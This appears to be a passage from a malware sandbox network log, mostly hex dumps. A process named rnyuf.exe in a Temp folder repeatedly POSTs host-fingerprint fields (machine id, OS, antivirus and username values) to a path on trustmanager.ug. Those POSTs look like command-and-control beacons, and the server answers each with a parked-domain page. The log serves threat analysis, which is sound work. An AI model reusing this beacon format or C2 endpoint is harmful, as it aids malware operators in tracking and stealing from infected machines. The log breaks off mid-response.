Aug 23, 2021 02:09:19.292912960 CEST	19503	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:19.292979956 CEST	19505	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:19.293005943 CEST	19508	OUT	Data Raw: ce 7f da 35 e7 65 0b de 99 ef 67 2e fe cf d0 f4 2b 2e 3e 1d c1 f5 1f ce b9 99 2b a4 b4 38 f8 77 6d ee 7f ad 72 f2 b9 04 fb 56 98 45 ef 4f d5 9c 99 9b b2 87 a2 22 72 41 e0 d2 09 64 1d 1c 8f c6 90 9c d3 6b d1 b2 3c 1e 67 7d 09 d6 ee 55 fe 2c fd 69 Data Ascii: 5eg.+.>+8wmrVEO"rAdk<g}U,ikSUhY.m$c)ci'lT4;kfR}8h/j'ic>pPU\ <M?m%6M=#VmlF\|U}b=Jg3EoISUd.S{U}D[.
Aug 23, 2021 02:09:19.318175077 CEST	19514	OUT	Data Raw: c1 35 d7 1d 06 c2 4f b9 2e 3f 1a 85 fc 30 a7 fd 5c c0 d5 7d 76 9b dc 4f 2c ac b6 39 9e 69 c0 1a dd 7f 0d dc af dd 21 aa bb e8 97 89 ff 00 2c b3 f4 aa 58 9a 6f 66 43 c1 56 8e e8 cc 5e b8 a7 e2 ac b6 9f 70 9d 61 61 f8 53 0c 32 0e a8 47 e1 55 ed 22 Data Ascii: 5O.?0\}vO,9i!,XofCV^paaS2GU"b3[03R6JhJ-Sr@)@e()SK- G]G5 v=4\G:g4Qp:P(u'zZ(AE-u_%ga[HmzS<aq
Aug 23, 2021 02:09:19.318207026 CEST	19519	OUT	Data Raw: 44 f2 b2 5a 51 51 07 1e b4 ed e3 d6 aa e8 56 63 e8 c5 37 78 f5 a3 78 f5 a7 74 2b 31 69 0f 5a 6e f1 9e b4 16 1e b5 37 43 b3 16 8a 66 e1 eb 46 f0 68 ba 1d 98 fa 51 4c dc 3d 69 41 1e b4 5d 0a cc 7d 14 99 1e b4 64 7a d3 ba 15 87 51 8a 68 23 d6 82 c3 Data Ascii: DZQQVc7xxt+1iZn7CfFhQL=iA]}dzQh#XqFi]J&Lw&ER3@<RAL4` K( SbE#-6)MQ,x4i!8SDL#J1jA%-&h&E&iE)*
Aug 23, 2021 02:09:19.370198965 CEST	19571	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.370218992 CEST	19571	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.2.3	49870	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:19.821765900 CEST	19880	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:19.849086046 CEST	19881	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.849127054 CEST	19881	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:19.963277102 CEST	19884	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:19.989562988 CEST	19886	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.989650011 CEST	19886	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:20.103866100 CEST	19886	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:20.129825115 CEST	19887	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 